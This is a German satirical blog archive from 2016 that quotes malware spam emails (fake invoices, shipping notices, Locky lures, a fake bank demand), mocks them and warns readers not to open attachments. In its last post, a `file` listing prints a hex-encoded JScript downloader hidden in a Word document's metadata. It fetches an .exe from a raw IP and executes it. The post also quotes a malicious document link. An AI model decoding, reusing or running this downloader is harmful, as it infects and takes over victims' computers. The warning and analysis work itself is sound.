Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Schadsoftware“

Rechnung zur Bestellung vom 08.10.2016 Nr. 551337926

Samstag, 8. Oktober 2016

Schön, dass die Bestellung ein Datum und eine Nummer hat.

Sehr geehrter Kunde,

Schön, dass ich so einen schönen Namen habe. Der klingt fast so persönlich wie eine Nummer.

leider mussten wir gerade feststellen, dass die Zahlungsaufforderung NR551337926 bis jetzt ergebnislos blieb. Jetzt gewähren wir Ihnen damit letztmalig die Chance, den ausbleibenden Betrag der Firma Online24 Pay GmbH zu begleichen.

Schön, dass die Nummer der Zahlungsaufforderung wiederholt wird. Diesmal ist es sogar die gleiche Nummer wie im Betreff. Das kriegen Spammer nicht immer hin. Ein „Wir“, das sich nicht näher vorstellt und kalt wie eine Wand ist, erinnert an die SPD im letzten Bundestagswahlkampf und gibt mir eine allerletzte Chance, Geld an eine Unternehmung zu bezahlen, mit der ich es noch niemals zu tun hatte. Wofür? Wieviel? Bis wann? Auf welches Konto? Das sind lauter Angaben, die im Text dieser Spam nicht halb so wichtig wie die Nummer der Bestellung sind.

Schließlich will dieser Spammer nicht das Geld seiner Opfer. Auch, wenn er…

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen dabei, die durch unsere Tätigkeit entstandene Gebühren von 65,38 Euro zu tragen. Bei Rückfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Bankkonto zu überweisen. Berücksichtigt wurden alle Buchungseingänge bis zum 07.10.2016.

…ständig im ungeübten Technokratentone vom Gelde spricht und sogar Fantasiegebühren verlangt und zu einer Kontaktaufnahme auffordert, ohne auch nur eine verdammte Adresse, eine Mailadresse oder eine Telefonnummer für die Kontaktaufnahme zu nennen. Das ist alles nur dafür da, den Empfänger dieser Spam einzuschüchtern und zu verängstigen, denn der Spammer weiß als erfahrener Verbrecher ganz genau, dass Angst dumm macht. Und wer dumm und ängstlich ist, der klickt halt gut…

Die gesamte Überweisung erwarten wir bis spätestens 14.10.2016. Falls wir bis zum genannten Termin keine Zahlung bestätigen, sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten gehen zu Ihrer Last.

Eine Wendung wie „sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben“ kann nur jemand tippen, der keine Ahnung vom gerichtlichen Mahnverfahren hat. Dafür fehlt so eine Angabe wie die Kontonummer, auf die man bis zum 14. Oktober überweisen soll – wer immer wirklich Geld haben wollte, würde diese Kontonummer ganz sicher angeben. (Übrigens würde auch jeder in der deutschen Sprache leidlich geübte Schreiber bei einer Fristsetzung den Monat als Wort ausschreiben, damit Missverständnisse beim Empfänger völlig ausgeschlossen sind.) Dieser kriminelle Spammer will kein Geld, er will nur…

Eine vollständige Forderungsausstellung Nr. 551337926, der Sie alle Buchungen entnehmen können, befindet sich im Anhang.

…dass man den Anhang aufmache.

Ein bisschen mehr zu diesem Anhang kommt in Kürze.

Mit verbindlichen Grüßen

Rechnungsstelle Marco Cock

Das heißt aber „unter Erbietung meiner vorzüglichsten Hochachtung verbleibe ich als ihr ergebener Marco Cock“. :mrgreen:

Diese E-Mail enthält vertrauliche und rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind und diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das Kopieren von Inhalten dieser E-Mail und die Weitergabe ohne Genehmigung ist nicht erlaubt und stellt eine Urheberrechtsverletzung dar.

Diese unverschlüsselte und nicht digital signierte Spam ist offen wie eine Postkarte durch das Internet befördert worden und konnte auf ihrem Weg von jedem mitgelesen oder sogar verändert werden. Wer behauptet, dass sie ganz geheime Geheimgeheimnisse enthält, dokumentiert damit seine technische Ahnungslosigkeit und seine lebenspraktische Dummheit. Wer ein Urheberrecht auf den Text einer E-Mail beansprucht, dokumentiert damit ebenfalls etwas für einen zivilisierten Menschen äußerst Unvorteilhaftes. Das tun allerdings nicht nur dumme Spammer; so einen vor Blödheit quietschenden Bullshit habe ich auch schon in E-Mail von Unternehmen gesehen, die gar nicht so lächerlich wie derartige Proklamationen in der gewerblichen Kommunikation sind. Wer mag, kann ja gern mal versuchen, vor Gericht sein „Urheberrecht“ gegen mich durchzusetzen und dabei einem möglicherweise erheitertem Gerichte gegenüber darlegen, dass es sich bei seiner Mail um ein Werk mit der dazu erforderlichen, schützenswerten Schöpfungshöhe handele, wenn ich eine seiner Mails zitiere. Ein kleiner Tipp von mir als Nichtjuristen, der natürlich keine Rechtsberatung geben darf und für eine Rechtsberatung auf einen richtigen Rechtsanwalt verweisen muss: Eine Bezugnahme aufs Fernmeldegeheimnis halte ich für wesentlich erfolgversprechender, wenn man es schon nötig hat, solche Veröffentlichungen juristisch zu unterdrücken. 😉

So, jetzt aber wieder zur Sache, nämlich…

Zum Anhang

An die Spam ist ein ZIP-Archiv mit dem Dateinamen 08.10.2016.zip angehängt, morgen wird es vermutlich das Datum von morgen werden. Dieses ZIP-Archiv ist in meinem Exemplar der Spam kaputt (es hat eine Dateigröße von null Bytes) und deshalb kann ich es nicht näher untersuchen – ich gehe aber davon aus, dass es in anderen Fällen, in denen das Spamskript funktioniert hat¹, wie üblich eine ausführbare Datei für Microsoft Windows sein wird. Typischerweise wird auf diese Weise sehr aktuelle Schadsoftware zugestellt, die von den Antivirus-Programmen noch nicht erkannt werden kann. Antivirus-Programme können nämlich nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist und sind generell von eher zweifelhaftem Nutzen.

Es handelt sich keineswegs um ein Dokument, aus dem irgend etwas hervorgeht. Es handelt sich um ein Windows-Programm, das von einem Verbrecher mit einer irreführend formulierten, vorsätzlich einschüchternden Spam zugestellt wurde. Die Verpackung in einem ZIP-Archiv hat nur den Zweck, Antivirus-Programmen auf einem Mailserver die Analyse zu erschweren², denn der Spammer lebt davon, dass seine kriminellen Spams ankommen. Wer eingeschüchtert ist, Microsoft Windows verwendet und angstvoll klicke-di-klick den Anhang öffnet, hat danach einen Computer anderer Leute auf seinem Schreibtisch stehen. Und diese Leute wären besser mit Handschellen und vergitterten Fenstern bedient!

Es ist immer verantwortungslos, dumm und gefährlich, Mailanhänge in E-Mails von Unbekannten zu öffnen. Bitte, lasst es einfach sein! Und öffnet auch bei scheinbar bekannten Absendern keine Mailanhänge, die nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurden, denn der Absender einer E-Mail kann beliebig gefälscht werden! Im Zweifelsfall ist auch dann noch die Zeit für ein kurzes Telefonat, wenn es einmal sehr eilig ist…

Diese kleine Vorsicht ist bei E-Mail wirksamer als jedes so genannte Antivirus-Programm.

¹Typischerweise sind die Anhänge von Schadsoftware-Spams nicht identisch, um eine leichte Erkennung und Ausfilterung des gefährlichen Mülls unmöglich zu machen. Diese Schadsoftware-Spammer leben nun einmal davon, dass ihre Mails auch ankommen. Natürlich werden diese „unterschiedlichen“ Anhänge mit einem Skript erzeugt, und natürlich machen auch die Spammer immer wieder einmal Fehler beim Programmieren. Deshalb kommt es zu solchen „verunglückten“ Anhängen. Nach meinen Erfahrungen ist im Durchschnitt rd. jede dreißigste Mail mit Schadsoftware wegen eines Programmierfehlers der Spammer unwirksam, in letzter Zeit „bessert“ sich das jedoch.

²Natürlich ist es möglich, beim Antivirus-Scan auf einem Mailserver auch ZIP-Archive auszupacken. Das wird aber meist nicht getan, damit der Mailserver nicht von kecken Angreifern mit einer recht einfach zu bauenden ZIP-Bombe lahmgelegt werden kann. Generell kann und sollte man einen ZIP-komprimierten Mailanhang als Indiz dafür betrachten, dass in der Mail Schadsoftware transportiert werden soll.

Ihre Bestellung ist auf dem Weg zu Ihnen! OrderID 0293126

Mittwoch, 21. September 2016

Achtung: Auf keinen Fall den Anhang öffnen! Es handelt sich um aktuelle und sehr gefährliche Schadsoftware, die von vielen Antivirusprogrammen zurzeit noch nicht erkannt wird. Generell sollten E-Mail-Anhänge immer mit äußerster Vorsicht behandelt werden, nicht nur, wenn jemand vor einer bestimmten E-Mail warnt.

Die Nummer nach OrderID im Betreff variiert natürlich.

Von: Kids Party World <service (at) kids (strich) party (strich) world (punkt) de>

Der Absender ist (wie beinahe immer in der Spam) eine Fälschung. Mein Exemplar dieser Spam wurde über die dynamisch vergebene IP-Adresse eines iranischen Telekommunikationsanbieters – also vermutlich über einen mit Schadsoftware übernommenen und in einem Botnetz missbrauchten iranischen Privatrechner – versendet. Die Spam hat niemals den im Absender angegebenen Server gesehen. Für den Menschen, dessen Rechner zurzeit von Kriminellen missbraucht wird, kann ich nur hoffen, dass die iranische Justiz in Internetdingen kompetenter ist als die deutsche, denn die in der Islamischen Republik Iran von Richtern ausgesprochenen Strafmaße sind wahrlich nicht von schlechten Eltern!

Sehr geehrter Kunde,

Ich will aber meine Kundennummer! Sonst ist mir das viel zu unpersönlich! :mrgreen:

Ihre Bestellung wurde am 21.09.2016 auf den Weg gebracht, bzw. von Ihnen bei uns im Lager abgeholt.

Welche Bestellung? Welche Vorgangsnummer? Von wann? Was wurde bestellt? Und was heißt hier „auf den Weg gebracht“? Habt ihr den Plunder vor eure Tür gestellt? :mrgreen:

Wie immer in der Schadsoftware-Spam steht im Text der Mail objektiv nichts, denn man soll ja einen Anhang aufmachen, um zu erfahren, um was es überhaupt geht.

Versanddienstleister für Standard Paketsendungen [sic!] ist die Firma DHL – für die Express Lieferungen [sic!] DHL-Express.

Blah! Für den Versand von Deppen Leer Zeichen ist DHL zuständig.

Eine Lieferadresse wäre doch auch mal interessant. Aber nein, man soll ja den Anhang aufmachen, und so steht eben nichts im Text der Spam.

Sollte Ihre Bestellung nicht in den nächsten 1-3 Werktagen (Mo – Sa) bei Ihnen eintreffen, dann wenden Sie sich bitte per eMail an uns.
Auslandsendungen innerhalb der EU, bzw. europ. Nachbarländer benötigen 2-5 Werktage (Mo – Fr).

EXPRESS Sendungen [sic!] werden grundsätzlich am nächsten Werktag bis 12.00 Uhr ausgeliefert. Express Samstags Sendungen [sic!] am folgenden Samstag bis 12.00 Uhr!

Blah. Aus einer anderen Quelle bezugslos in die Spam kopierter, völlig nichtssagender und nicht informativer Text, der zudem sehr peinliche Deppen Leer Zeichen der Marke „Express Samstags Sendungen“ enthält.

Einzelheiten der Lieferung können Sie über den folgenden Link einsehen:

http://nolp.dhl.de/nextt-online-public/set_identcodes.do?lang=de&idc=05841224279920

Ja, schon klar! Einfach eine Tracking-Nummer nehmen, die es gar nicht gibt, so dass man völlig legitim auf DHL verlinken kann und der Empfänger den Hinweis sieht, dass zu dieser Sendung gar keine Informationen vorliegen. Toller Trick! Allerdings stünde dort etwas anderes, wenn die Sendung „auf den Weg gebracht“ worden wäre…

Die DHL Tracking Nr. lautet:

05841224279920

Oh, wie nett! So muss ich sie nicht aus dem URI lesen. Das hat mich jetzt zwar nicht überfordert, aber immerhin sieht so der Text der Spam nach etwas mehr aus, ohne das etwas Inhaltliches mitgeteilt wurde. Könnt ihr Absender mir jetzt bitte mal sagen, was in dem Paket überhaupt drin ist?! Ach, um das zu erfahren, soll ich den Anhang mit eurer frischen Schadsoftware öffnen, schon klar…

Dass dieses Mailpapier aber auch immer so begrenzt ist! :mrgreen:

Bitte beachten Sie bei der Paketannahme den Zustand des Pakets. Wenn eine Beschädigung des Pakets vorliegt, bitten wir Sie diese von dem Zusteller aufnehmen zu lassen. Nur dann kann die Versandversicherung im Falle einer Beschädigung der Waren in Anspruch genommen werden.

Blah. Auch dieser Text wurde von irgendwo in die Spam kopiert und enthält keine für den Empfänger relevante Information. Immerhin wird mir diesmal eine „Paket Annahme“ und eine „Versand Versicherung“ erspart; es scheint sich um eine andere Quelle zu handeln. 😀

(Was wärt ihr nur ohne eure Zwischenablage, Spammer! Da müsstet ihr euch ja mühsam selbst die Texte ausdenken. Das passte so etwas von gar nicht zu euch. Denn wenn ihr euch Mühe geben wolltet, dann könntet ihr ja gleich arbeiten gehen…)

Eine Rechnungskopie zu Ihrer Information haben wir dieser eMail beigefügt.

Nicht einmal der Rechnungsbetrag wird erwähnt, auch keine Bankverbindung und nichts. Um überhaupt irgendetwas zu erfahren, muss man den Anhang öffnen, denn in der Spam steht nur bedeutungsleerer Blah. Genau das – dass man von vorgeblichen Zahlungsverpflichtungen aufgescheucht möglichst unter Umgehung des Gehirnes den Anhang öffne – ist nämlich das einzige Ziel der Spammer. Die haben diese Spam ja nicht aus dem Grund geschrieben, aus dem man normalerweise Mail schreibt: Um etwas mitzuteilen.

Vielen Dank für Ihren Einkauf in unserem Online Shop [sic!]

Vielen Dank für euer Deppen Leer Zeichen, das immer ein Zeichen leerer Deppen ist.

Wir freuen uns auf einen weiteren Besuch von Ihnen!

Aber ich war nie bei euch…

Mit freundlichen Grüßen,

Ihr Kids Party World Team

Kids Party World
Senefelder Str. 2
63110 Rodgau

Tel.: 06106/266xxxx
UstID: DE235212299

Die Kürzung der Telefonnummer ist von mir. Die in der Spam angegebene Telefonnummer gehört wirklich zu „Kids Party World“. Wer immer gerade an diesem Telefon sitzt, tut mir leid. Dem Spammer ist es natürlich egal, was er anrichtet; dem reicht es, wenn sein kriminelles Geschäft läuft. Egal, ob Menschen bis an den Rand des Nervenzusammenbruches terrorisiert werden oder ob die Reputation von Unternehmungen mit dem Missbrauch der Firmierung durch den Dreck gezogen wird. Spammer sind nun einmal asoziale Kriminelle, die für ein paar Groschen alles kaputt machen würden. Wenn es diese Widerlinge nicht gäbe, würde vermutlich nur die Mutter etwas vermissen. Und nicht einmal das ist sicher…

besuchen Sie uns auch auf Facebook:
https://www.facebook.com/kids.party.world.shopping

Wer mich dazu auffordert, die Website einer stinkenden Spamsau wie Facebook zu besuchen, braucht nicht damit zu rechnen, dass ich mit ihm jemals ins Geschäft kommen werde. Ganz im Gegenteil. Ich hasse nämlich Spam. Und Leute, die einen asozialen Spammer so offen unterstützen, sind die Spam.

Der Anhang

Der Anhang der Mail ist ein ZIP-Archiv…

$ unzip -l invoice_912408.zip 
Archive:  invoice_912408.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    33676  2016-09-21 12:49   IHPHICX18402.wsf
---------                     -------
    33676                     1 file
$ _

…das eine einzige Datei enthält. Die Dateinamenserweiterung .wsf ist eine Abk., die ausgeschrieben „Windows Script File“ bedeutet. Es handelt sich nicht um ein Dokument, sondern um eine ausführbare Datei für Microsoft Windows; um ein Programm, das von einem Spammer mit einer irreführend formulierten Mail zugestellt wurde. Das Programm ist vorsätzlich kryptisch formuliert, um eine Analyse durch Antivirus-Schlangenöl und menschliche Experten zu erschweren.

Es handelt sich zweifelsfrei um Schadsoftware.

Wer das ZIP-Archiv auspackt und die Datei unter Microsoft Windows doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen.

Diese klare Schadsoftware wird zurzeit von rd. 85 Prozent der gängigen Antivirus-Schlangenöle nicht als Schadsoftware erkannt. Antivirus-Programme können immer nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist. Sie versagen grundsätzlich bei aktueller Schadsoftware, wie man sie oft in derartigen Spammails zugestellt bekommt.

Deshalb ist es wichtig, dass man derartige Versuche selbst erkennt. Hinweise dazu (die Mail ist objektiv inhaltsleer, alles Wichtige steht erst im Anhang – das sind typische rhetorische Tricks in der Schadsoftware-Spam) habe ich hier und an vielen anderen Stellen gegeben. Grundsätzlich sollte niemals ein Anhang aus einer E-Mail geöffnet werden, wenn die Zustellung der Datei nicht über einen anderen Kanal als E-Mail explizit vereinbart wurde¹; und ein Anhang aus der Mail eines Unbekannten verbietet sich völlig. Es ist übrigens niemals so eilig, dass man nicht vor dem Öffnen telefonisch (oder via IM) rückfragen kann, ob die Mail echt ist.

Aber bitte nicht bei derartigen Spams rückrufen! Dass es sich hier um Spam handelt, lässt sich nämlich leicht an anderen Merkmalen erkennen. Die armen Seelen dort bei „Kids Party World“ am Telefon! 🙁

¹Warum ein anderer Kanal? Um sicher sein zu können, dass der Absender echt ist. Der Absender eine E-Mail kann kinderleicht und beliebig gefälscht werden. Deshalb sollte meiner Meinung nach jeder Mensch und jedes Unternehmen (insbesondere Banken) digital signierte E-Mail verwenden, um jenseits jedes vernünftigen Zweifels sicherstellen zu können, dass der Absender im Besitz eines bestimmten privaten Schlüssels ist. Das ist relativ einfach und kostet kein Geld, bringt aber viel für die Computersicherheit und gegen die Organisierte Kriminalität im Internet. Ich rede allerdings in diesem Punkt seit zwei verdammten Jahrzehnten gegen Wände aus betonhafter Dummheit.

Locky geht um! Keine Anhänge öffnen!

Donnerstag, 15. September 2016

In den letzten Stunden kommen bei mir vor allem englischsprache Mails an, die dem üblichen Muster entsprechen: Im Text der Mail steht (mit möglichst alarmierenden Worten) nichts; um zu erfahren, um was es überhaupt geht, muss der Anhang geöffnet werden. Dieser ist in meinen Versionen immer ein ZIP-Archiv, in dem eine ausführbare Datei für Microsoft Windows liegt. Dass es sich dabei um das reinste Gift handelt, bedarf wohl keiner weiteren Erläuterung…

Zielgruppe der Verbrecher sind offenbar Unternehmen.

Ein paar Beispiele? Gern, hier eines:

Betreff: financial report

Kayla is urging you to get the financial report done within this week.

Here are some accounting data I have collected. Please merge it into your report.

Best regards,

Jeanine Conner

Hier ein anderes:

Betreff: Renewed License

Here is the company’s renewed business license.

Please see the attached license and send it to the head office.

Best regards,
Sara Rowe
License Manager

Und hier noch ein abschließendes Beispiel:

Betreff: Confirmation letter

Dear customer,

The bank has sent loan confirmation letter. Please review the amount of funds.

Many thanks,
Chrystal Estes
Personal Manager

Ich habe mehr davon. Viel mehr.

Der Anhang ist eigentlich immer das gleiche: Eine Variante des aktuellen Erpressungstrojaners „Locky“ (der von den Verbrechern frisch angepasst wurde) oder ein Programm, das „Locky“ aus dem Internet nachlädt und startet. Die Erkennung durch Antivirus-Schlangenöle ist eher schlecht. Wer sich auf diesen Schutz verlässt, ist wieder einmal verlassen und darf hinterher entweder ein Backup zurückspielen oder aber – wenn kein Backup vorhanden ist – mit dem Datenverlust leben.

Deshalb: Auf gar keinen Fall in Mailanhänge klicken, die nicht über einen anderen Kommunikationskanal als E-Mail explizit verabredet wurden! Wenn es dennoch dringend scheint, ist es nie so dringend, dass man nicht vorher telefonische Rücksprache mit dem Absender halten kann. Es ist immer gefährlich, unverlangt zugestellte Mailanhänge zu öffnen. Und im Moment ist es sehr gefährlich.

Ich halte es nur noch für eine Frage von wenigen Stunden, bis die gleiche Flut von Schadsoftware in deutscher Sprache an jede Mailadresse geht, die Spammer mit ihren Harvester-Skripten einsammeln konnten. Das Antivirus-Programm nützt nichts. Die Firewall nützt nichts. Das einzige, was hilft, ist, wenn die Empfänger solcher Spam derartige Spam als Spam erkennen und löschen, statt darin herumzuklicken. Und zwar auch dann, wenn der scheinbare Absender ein Kollege, ein Verwandter oder der Chef ist – angesichts der Datenmengen, die Verbrechern mittlerweile zur Verfügung stehen, sind gezielte Angriffe auf Unternehmen nur noch eine Frage der Zeit.

Shipping information

Samstag, 3. September 2016

Dear customer,

Ich bin aber „Liebe 13a9-32-04872 Kundennummer“ und nicht „Lieber Kunde“.

Our shipping service is sending the order form due to the request from your company.

Ich habe auch kein Unternehmen. Und nicht habe nichts angefordert. Und ich werde nichts bestellen.

Please fill the attached form with precise information.

Zielgruppe sind natürlich Mitarbeiter richtiger Unternehmen, die jetzt den Anhang aufmachen sollen, um einen Erpressungstrojaner im Unternehmensnetzwerk zu installieren. Ja, es handelt sich um Schadsoftware. Nein, es ist kein Dokument.

Very truly yours,
Adele Bernard

Du mich auch!

Ich sage es immer wieder, und ich muss es doch noch einmal wiederholen. E-Mail ist ein praktisches, aber auch gefährliches Medium. Es ermöglicht unter anderem Kriminellen, anderen Leuten Dateien zusammen mit einem Vorwand zuzustellen. Jeder Link in einer E-Mail und jede Anhang einer E-Mail ist als gefährlich zu betrachten. Immer. Auch, wenn das Antivirus-Schlangenöl keinen Alarm gibt. Niemals einen E-Mail-Anhang öffnen, der nicht vorher explizit und über einen anderen Kanal als E-Mail vereinbart wurde! Niemals auf eine E-Mail hereinfallen, weil der Absender zu passen scheint, denn der Absender einer E-Mail ist beliebig fälschbar! Immer telefonisch zurückfragen! Und am besten dafür Sorge tragen, dass nur noch digital signierte E-Mail verwendet wird, bei der man den Absender jenseits jedes vernünftigen Zweifels sicherstellen kann. Das kostet nicht einmal Geld. Und es ist nicht schwierig. Ich sage es immer wieder. Ich spreche es in die Flammen, ich spreche es in das Nichts, vor mir rollt eine Welt voll schreiender Dummheit vorbei, die Verbrecher jubeln auf einem Berg von Bitcoin… 🙁

Zum „Glück“ ist es diesmal ein etwas „älterer“ Vertreter, der das erste Mal am 1. September 2016 zu VirusTotal hochgeladen wurde; und deshalb wird die klare Schadsoftware inzwischen schon von der Hälfte der populären Antivirus-Schlangenöle erkannt. Es wäre ja auch echt jetzt mal und wirklich zu viel verlangt, wenn binnen zwei Tage jedes dieser Schlangenöle gegen die aktuell umlaufenden Seuchen funktionieren würde! 🙁

Wie üblich handelt es sich um ein angehängtes ZIP-Archiv…

$ unzip -l 18bbe011a687.zip 
Archive:  18bbe011a687.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    95801  2016-09-03 08:35   D1B2DB19_shipping_service.js
---------                     -------
    95801                     1 file
$ _

…in dem diesmal wieder ein Javascript-Programm für den Windows Script Host liegt. Dies ist eine ausführbare Datei für Microsoft Windows, die bei einem Doppelklick ausgeführt wird. Dieses Programm ist vorsätzlich unverständlich gecodet, um eine Analyse und eine Erkennung durch Antivirus-Software zu erschweren. Es ist klare Schadsoftware. Nach dem dummen Doppelklick steht ein Computer anderer Leute auf dem Schreibtisch. Wenn das in einem Unternehmen passiert, kann sich die Seuche auch im gesamten Unternehmensnetzwerk verbreiten. Weil ein einziger Mensch so naiv war, einen Mailanhang zu „öffnen“ und damit ein Programm von Verbrechern auszuführen.

Und deshalb öffnet man keine Dateien aus einer E-Mail, deren Zustellung nicht vorher über einen anderen Kanal als E-Mail abgesprochen wurde… ach! Ich spreche in die Flammen, ich spreche in das Nichts. 🙁

auftrag nr. 134536339

Montag, 29. August 2016

Vorab: Auf gar keinen Fall den Anhang aufmachen!

Ihre Kundennummer: 4091651

Ah, schön, ich habe eine Nummer.

Auftragsnummer: 134536339

Und das, was ich angeblich beauftragt habe, hat ebenfalls eine fröhliche Ziffernfolge…

Auftragssumme: 13 Eur

…und kostet angeblich Geld. Seltsam, dass ich gar nichts davon weiß.

Liebe Kundin, Lieber Kunde,

Was ich allerdings nicht habe, ist ein Name.

Danke für Ihre Bestellung.

Was mein Auftrag nicht hat, ist ein menschenlesbarer Text neben der schönen, aber für einen Menschen zunächst unverständlichen Ziffernfolge, dem man entnehmen könnte, um was zum hl. Henker es überhaupt geht.

Bitte schauen Sie in den PDF-Anhang für nähere Informationen (klicken Sie doppelt auf das PDF-Dokument).

Um das herauszubekommen, muss ich klick-klick einen Mailanhang öffnen. Damit ich das auch wirklich hinbekomme, sagt mir der Spammer auch noch, wie ich das mache.

Mit freundlichen Grüßen

Ihr Casando-Versand Team
Casando GmbH

Es gibt eine Unternehmung namens Casando, aber die ist nicht für diese gefährliche Spam verantwortlich. Ich möchte dort heute nicht am Telefon sitzen. Dem asozialen Loch von Spammer ist es aber egal, was er anrichtet. Das sieht man ja auch am Anhang…

Hinweis:
Zum Öffnen der PDF-Datei im Anhang benötigen Sie den Acrobat Reader.
Den Gratis-Download des Programms finden Sie unter http://get.adobe.com/de/reader.

…der mitnichten ein PDF-Dokument ist. Es handelt sich um ein ZIP-Archiv, in dem…

$ unzip -l dokument_id1784780765.zip 
Archive:  dokument_id1784780765.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      468  2016-08-24 06:05   dokument_id1784780765.pdf                                             .vbe
---------                     -------
      468                     1 file
$ _

…eine Datei liegt, deren Name auf .vbe endet. Um diese „Kleinigkeit“ vorm Empfänger zu verstecken, enthält der Name vor der richtigen Extension ganz viele Leerzeichen, so dass zusammen mit dem irreführenden Dateinamen der Eindruck entsteht, es handele sich um ein PDF. Die Extension .vbe steht nicht für ein Dokumentformat. Es ist ein ausführbares Programm für Microsoft Windows, das als Anhang einer irreführend formulierten Spam versendet wird und das seinen wirklichen Dateitypen mit einem Trick verbirgt. Das ist klare Schadsoftware. Wer darauf – ganz so, wie der kriminelle Spammer auffordert – doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Viele populäre Antivirus-Programme scheitern zurzeit daran, diese Schadsoftware als solche zu erkennen, was bei derartigen Mails leider der Normalfall ist. Deshalb muss man immer sein Gehirn benutzen. Wer sich auf sein Antivirus-Schlangenöl verlässt, lebt sehr gefährlich.

Und deshalb öffnet man niemals einen Mailanhang, der nicht vorher und über einen anderen Kanal als E-Mail explizit verabredet wurde. Näheres zu diesem Thema habe ich hier schon etwas ausführlicher geschrieben. Ich bitte um Beachtung. Und um Verbreitung, denn es gibt immer noch zu viele Menschen, die auf derartige Spams reinfallen und hinterher bang Banknoten der Europäischen Zentralbank gegen Bitcoin eintauschen, um wieder an ihre Korrespondenz, ihre Fotos, ihre Musik, ihre Dokumente, ihre Filme und ihre Sozialkontakte zu kommen.

Übrigens: Wer regelmäßige Datensicherungen macht, braucht sein Geld nicht derartigen Verbrechern zu geben, wenn er doch mal überrumpelt wurde, sondern spielt einfach eine Datensicherung zurück. 😉

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

